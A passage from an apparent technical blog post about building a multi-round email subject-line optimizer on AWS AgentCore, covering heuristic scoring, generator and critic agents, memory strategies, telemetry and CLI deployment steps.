&lt;p&gt;If there's still room to improve and rounds remain, the bottom 40% are pruned and handed to the critic. The critic explains what patterns made them lose in two to four sentences, referencing specific signals. That guidance feeds into the next round's regeneration prompt.&lt;/p&gt;

&lt;p&gt;After at most four rounds, the loop returns the top five candidates with the full per-round log and the memory context read at the start.&lt;/p&gt;




&lt;h2&gt;
  
  
  IV. Scoring
&lt;/h2&gt;

&lt;p&gt;Every candidate produced by the generator gets a score before the loop decides what to keep and what to prune. The scorer runs 45 heuristics against each subject line and returns a composite score between 0 and 100, a predicted open-rate band, per-dimension breakdowns and an explanation of the top contributions. The heuristics are stored in a simple CSV and cover 9 dimensions: length, urgency, spam risk, curiosity triggers, value signals, personalization, style, audience fit and brand voice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A heuristic is not a rule.&lt;/strong&gt; A rule is binary — pass or fail, always. A heuristic is a signal that contributes positively or negatively to a score based on what the literature says tends to correlate with open rates. "Subject lines between 30 and 50 characters score better" is an empirical observation, not a constraint.&lt;/p&gt;
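&lt;p&gt;In code, a heuristic is just a weighted signal added to a running total. A stripped-down sketch with only two rule shapes and an assumed neutral baseline of 50 (the real scorer has 45 rules, more match types and per-dimension breakdowns):&lt;/p&gt;

```python
def apply_heuristics(subject: str, rules: list[dict]) -> float:
    """Add the weight of every rule whose signal fires, then clamp the
    total into a 0-100 composite. Rule shapes here are illustrative."""
    score = 50.0  # neutral baseline; an assumption, not the project's value
    lowered = subject.lower()
    for rule in rules:
        if rule["match_type"] == "range":
            lo, hi = rule["pattern"]
            if lo <= len(subject) <= hi:
                score += rule["weight"]
        elif rule["match_type"] == "word_any":
            if any(word in lowered for word in rule["pattern"]):
                score += rule["weight"]
    return max(0.0, min(100.0, score))

rules = [
    {"match_type": "range", "pattern": (30, 50), "weight": 8.0},
    {"match_type": "word_any", "pattern": ["free"], "weight": -6.0},
]
```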

&lt;p&gt;The same urgency words that lift acquisition open rates by +1.0 point hurt retention campaigns by −2.0 and are inappropriate for regulatory notices at −5.0. The &lt;code&gt;audience_modifier&lt;/code&gt; column captures that context-dependence per rule; audience tags are inferred automatically from briefing free-text.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rule_id,category,pattern,match_type,weight,audience_modifier
LEN_SWEET_SPOT_30_50,length,30-50,range,8.0,
URGENCY_BASE_LIFT,urgency,urgent|hurry|now|today,word_any,3.5,acquisition:+1.0;retention:-2.0;regulatory:-5.0
SPAM_TRIGGER_FREE,spam_risk,free|100% free,word_any,-6.0,
VALUE_FREE_SHIPPING,value_signals,free shipping,phrase,4.0,acquisition:+1.0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;These weights are starting points. A real company would probably use a model trained on their own send history or something similar.&lt;/p&gt;
&lt;/blockquote&gt;
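&lt;p&gt;Parsing the &lt;code&gt;audience_modifier&lt;/code&gt; column is mechanical. A sketch, assuming the semicolon-and-colon format shown in the CSV above (helper names are mine, not the repo's):&lt;/p&gt;

```python
def parse_audience_modifiers(cell: str) -> dict[str, float]:
    """Turn 'acquisition:+1.0;retention:-2.0' into a tag-to-delta map.
    An empty cell means the rule's weight applies unmodified."""
    if not cell:
        return {}
    mods = {}
    for part in cell.split(";"):
        tag, delta = part.split(":")
        mods[tag.strip()] = float(delta)
    return mods

def effective_weight(base: float, cell: str, audience_tags: set[str]) -> float:
    """Base weight plus every modifier whose tag matches the briefing's
    inferred audience tags."""
    mods = parse_audience_modifiers(cell)
    return base + sum(d for tag, d in mods.items() if tag in audience_tags)
```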




&lt;h2&gt;
  
  
  V. The two agents and Bedrock
&lt;/h2&gt;

&lt;p&gt;The Generator and Critic share a model and a session manager but have nothing else in common.&lt;/p&gt;

&lt;p&gt;Both agents are Strands &lt;code&gt;Agent&lt;/code&gt; instances backed by &lt;strong&gt;Amazon Nova 2 Lite&lt;/strong&gt;, invoked via Bedrock's cross-region inference profile. Both are wired to &lt;code&gt;AgentCoreMemorySessionManager&lt;/code&gt;, which writes each turn as a session event automatically. Neither agent needs to know about memory because the session manager handles it transparently.&lt;/p&gt;

&lt;p&gt;The Generator enforces its output shape through Strands' structured output support rather than prompt engineering. Instead of instructing the model to "output strict JSON arrays only" and then parsing whatever it produces, you pass a Pydantic schema to the agent call and Bedrock enforces it at the model level:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;SubjectLineList&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BaseModel&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;subject_lines&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Field&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Email subject line candidates, one per requested slot.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;_n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;generator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;structured_output_model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;SubjectLineList&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;structured_output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;subject_lines&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Critic is told to produce two to four sentences of explicit, actionable guidance. No generic advice — it must reference specific patterns in the candidates it's reviewing. "These lines are too long" is not useful guidance for regeneration. "The urgency phrasing in candidates 3 and 5 reads as promotional spam rather than genuine time pressure. Try anchoring to a specific benefit instead" is.&lt;/p&gt;

&lt;p&gt;That guidance becomes part of the next round's prompt directly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;prompt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;regenerate_prompt_builder&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;memory_context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;subject_line&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;survivors&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;guidance&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;n_to_generate&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The surviving candidates and the Critic's diagnosis arrive together. The Generator sees what worked, what didn't and why.&lt;/p&gt;
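&lt;p&gt;An illustrative shape for &lt;code&gt;regenerate_prompt&lt;/code&gt;, just to show how survivors and guidance end up in one prompt. The real builder lives in the repo and its wording will differ:&lt;/p&gt;

```python
import json

def regenerate_prompt(briefing, memory_context, survivors, guidance, n_to_generate):
    """Assemble the regeneration prompt: briefing, recalled patterns,
    surviving lines to avoid duplicating, and the Critic's guidance.
    Illustrative sketch only."""
    survivor_block = "\n".join(f"- {line}" for line in survivors)
    return (
        f"Campaign briefing:\n{json.dumps(briefing)}\n\n"
        f"Learned patterns:\n{memory_context or 'none'}\n\n"
        f"Current survivors (do not repeat them):\n{survivor_block}\n\n"
        f"Critic guidance from the last round:\n{guidance}\n\n"
        f"Generate {n_to_generate} new subject lines as a JSON array of strings."
    )
```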




&lt;h2&gt;
  
  
  VI. AgentCore Memory: four strategies
&lt;/h2&gt;

&lt;p&gt;Memory touches this project in two distinct ways. The Strands session manager writes conversation events automatically: every Generator and Critic turn lands in the session namespace without the agent writing a line of code for it. Separately, &lt;code&gt;recall_for_user&lt;/code&gt; reads extracted patterns explicitly at the start of each optimization run, before any candidate is generated.&lt;/p&gt;

&lt;p&gt;Memory also works on two timescales:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Short-term:&lt;/strong&gt; Within a session, the Strands session manager keeps the full conversation in context, making sure the Critic sees every prior round and the Generator sees every prior critique.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Long-term:&lt;/strong&gt; Across sessions, AgentCore's four extraction strategies run asynchronously, roughly 60 seconds after a session ends, and populate long-term namespaces:&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Strategy&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Namespace&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SEMANTIC&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;General facts inferred from session content&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/users/{actor_id}/facts&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;USER_PREFERENCE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Behavioral patterns inferred from what consistently scored well or was pruned&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/users/{actor_id}/preferences&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SUMMARIZATION&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A compressed summary of the session&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/summaries/{actor_id}/{session_id}&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;EPISODIC&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A record of what happened&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/episodes/{actor_id}/{session_id}&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The agent never writes subject lines or briefings directly to long-term storage. It writes session events and the strategies decide what is worth keeping and in what form.&lt;/p&gt;
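&lt;p&gt;The namespace templates in the table are plain format strings. A small sketch of how they resolve per user and session (the templates are copied from the table; the helper itself is hypothetical):&lt;/p&gt;

```python
# Namespace templates from the table above; the resolver is illustrative.
NAMESPACES = {
    "SEMANTIC": "/users/{actor_id}/facts",
    "USER_PREFERENCE": "/users/{actor_id}/preferences",
    "SUMMARIZATION": "/summaries/{actor_id}/{session_id}",
    "EPISODIC": "/episodes/{actor_id}/{session_id}",
}

def resolve_namespace(strategy: str, actor_id: str, session_id: str = "") -> str:
    return NAMESPACES[strategy].format(actor_id=actor_id, session_id=session_id)
```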

&lt;h3&gt;
  
  
  What the loop reads
&lt;/h3&gt;

&lt;p&gt;At the start of each run, &lt;code&gt;recall_for_user&lt;/code&gt; queries the facts and preferences namespaces using the briefing as the retrieval query. It returns up to five patterns per namespace, ranked by relevance score. Those patterns flow into the round-one generation prompt:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Patterns observed across this user's prior sessions:
- Urgency-led subject lines were pruned in 3 of 4 prior sessions
- Premium and exclusivity framing consistently reached the final shortlist

Inferred preferences for this user:
- Discount and price-led language does not align with observed brand voice
- Sentence case outperformed title case across recent campaigns
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Generator sees what worked and what didn't before producing a single candidate.&lt;/p&gt;
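
&lt;p&gt;The prompt fragment above can be assembled from the retrieval results with plain string formatting. A sketch, assuming each retrieved record is a (text, score) pair already ranked by the store; the function name and record shape are illustrative, not the project's actual code:&lt;/p&gt;

```python
def format_recall_section(facts, preferences, limit=5):
    """Render retrieved memory records into the round-one prompt section.
    Records are (text, relevance_score) pairs, already ranked by the store."""
    lines = ["Patterns observed across this user's prior sessions:"]
    lines += [f"- {text}" for text, _ in facts[:limit]]
    lines.append("")
    lines.append("Inferred preferences for this user:")
    lines += [f"- {text}" for text, _ in preferences[:limit]]
    return "\n".join(lines)

section = format_recall_section(
    [("Urgency-led subject lines were pruned in 3 of 4 prior sessions", 0.91)],
    [("Sentence case outperformed title case across recent campaigns", 0.87)],
)
print(section)
```

&lt;p&gt;The &lt;code&gt;limit&lt;/code&gt; of five per namespace mirrors the retrieval cap described above.&lt;/p&gt;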




&lt;h2&gt;
  
  
  VII. Observability
&lt;/h2&gt;

&lt;p&gt;The optimization loop runs for 30–90 seconds across up to four rounds. Without instrumentation, a slow run and a failing run look identical from the outside.&lt;/p&gt;

&lt;p&gt;After each completed round, the loop calls an &lt;code&gt;on_round&lt;/code&gt; callback with a &lt;code&gt;RoundLog&lt;/code&gt;. The shell's implementation emits two concurrent signals:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;_emit_round_telemetry&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;RoundLog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;span&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;_tracer&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;start_span&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;optimization_round&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.number&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;round_number&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.candidate_count&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;candidates&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.pruned_count&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pruned&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.top3_average&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;round&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;top3_avg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.top_score&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;round&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;top_score&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.top_subject_line&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;top_subject&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.guidance_excerpt&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;guidance&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;300&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="k"&gt;finally&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;optimization_round_complete&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;extra&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{...})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An &lt;code&gt;optimization_round&lt;/code&gt; OTel span with seven attributes appears as a child span under each invocation in AgentCore traces. The &lt;code&gt;round.top3_average&lt;/code&gt; and &lt;code&gt;round.top_score&lt;/code&gt; attributes show whether scores are improving across rounds. &lt;code&gt;round.guidance_excerpt&lt;/code&gt; shows what the critic said before each regeneration step — the most useful signal when a run plateaus unexpectedly.&lt;/p&gt;

&lt;p&gt;The same fields appear as a structured &lt;code&gt;log.info&lt;/code&gt; event, queryable in CloudWatch Logs Insights:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fields @timestamp, round_number, top3_average, top_score, guidance_excerpt
| filter @message = "optimization_round_complete"
| sort @timestamp asc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;traceId&lt;/code&gt; field on the log event matches the span ID in the traces UI, so you can move between the two surfaces without losing context.&lt;/p&gt;




&lt;h2&gt;
  
  
  VIII. What I didn't use this time
&lt;/h2&gt;

&lt;p&gt;AgentCore ships with more primitives than this project uses. Some of the ones that didn't make it in are worth naming.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code Interpreter&lt;/strong&gt; is the right choice when code has to run in a sandbox: the LLM authors it at runtime, it carries untrusted dependencies, or it comes from a source outside the agent's own deployment artifact. The scoring script here is 250 lines of standard-library Python, authored by the agent's owner and deployed in the same place as &lt;code&gt;main.py&lt;/code&gt;. There is no organizational or security boundary for Code Interpreter to enforce. Adding a managed sandbox would introduce spin-up latency, a separate billing line, a separate failure mode, and a service dependency.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Policy&lt;/strong&gt; manages what agents are allowed to do — which tools they can call, which users can invoke them, which actions are gated behind approval. It earns its place in multi-tenant deployments where different users have different permissions or in agentic workflows where the consequences of a wrong action are hard to reverse.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gateway&lt;/strong&gt; exposes an agent as a managed API endpoint with authentication, rate limiting, and request routing. It's the right choice when the agent is a shared service consumed by multiple callers across organizational boundaries.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Every primitive on this list is genuinely useful for the problems it was designed to solve. The real challenge is identifying which problem you actually have. Adopting every available managed service does not make an agent more sophisticated, and it often makes the system harder to reason about, more expensive to run, or more fragile.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;When evaluating a new service or capability, ask three questions: what complexity am I introducing alongside it, what failure modes come with it, and does it meaningfully simplify the system?&lt;/p&gt;




&lt;h2&gt;
  
  
  IX. How to deploy and run it
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Prerequisites
&lt;/h3&gt;

&lt;p&gt;Before deploying, make sure you have:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An AWS account with Amazon Bedrock access&lt;/li&gt;
&lt;li&gt;The agentcore CLI installed (&lt;code&gt;npm install -g @aws/agentcore-cli&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;AWS credentials configured with permissions for Bedrock, CloudFormation, IAM, ECR, and S3&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To confirm your credentials are working:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws sts get-caller-identity
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Testing locally before deploying
&lt;/h3&gt;

&lt;p&gt;To iterate on the agent without incurring a full deploy cycle, you can run the local dev server:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore dev
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This starts the runtime at &lt;code&gt;http://localhost:8080&lt;/code&gt;. Bedrock model calls still go to AWS, so you need valid credentials, but no CloudFormation changes are made. Memory is not active in dev mode unless you export &lt;code&gt;MEMORY_ID&lt;/code&gt; manually with the ID from your deployed memory resource.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyqrnvmprq6udly9i6p62.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyqrnvmprq6udly9i6p62.png" alt=" " width="800" height="553"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Deploying
&lt;/h3&gt;

&lt;p&gt;From the project root:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore deploy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The CLI runs CDK under the hood, synthesizing a CloudFormation stack, bootstrapping the CDK environment if needed, and provisioning the runtime, the memory resource, and the IAM roles. The first deploy takes a couple of minutes. When it completes you'll see a runtime ARN in the output — that ARN is the deployed endpoint.&lt;/p&gt;

&lt;h3&gt;
  
  
  Running an invocation
&lt;/h3&gt;

&lt;p&gt;The project ships with four example briefings under &lt;code&gt;app/subject_line_optimizer/briefing/examples/&lt;/code&gt;. Each is a self-contained campaign briefing JSON ready to send.&lt;/p&gt;

&lt;p&gt;To invoke the deployed agent with the reactivation example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore invoke &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--target&lt;/span&gt; default &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--prompt-file&lt;/span&gt; app/subject_line_optimizer/briefing/examples/reactivation.json &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--session-id&lt;/span&gt; &lt;span class="s2"&gt;"create-an-id-here-001"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--user-id&lt;/span&gt; &lt;span class="s2"&gt;"your-user-id"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--stream&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A few things to note:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;--target default&lt;/code&gt; routes to the deployed endpoint, not the local dev server&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--prompt-file&lt;/code&gt; reads the briefing directly; the CLI wraps it in &lt;code&gt;{"prompt": "..."}&lt;/code&gt; before sending, so pass the raw briefing file&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--session-id&lt;/code&gt; must be at least 33 characters; a UUID works well&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--user-id&lt;/code&gt; scopes the AgentCore Memory namespaces — use a consistent identifier across sessions so the agent accumulates preferences for that user over time&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--stream&lt;/code&gt; prints each chunk as it arrives, so you see the rounds progressing in real time&lt;/li&gt;
&lt;/ul&gt;
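
&lt;p&gt;On the session ID requirement: a random UUID string is 36 characters, which clears the 33-character minimum. A quick stdlib check:&lt;/p&gt;

```python
import uuid

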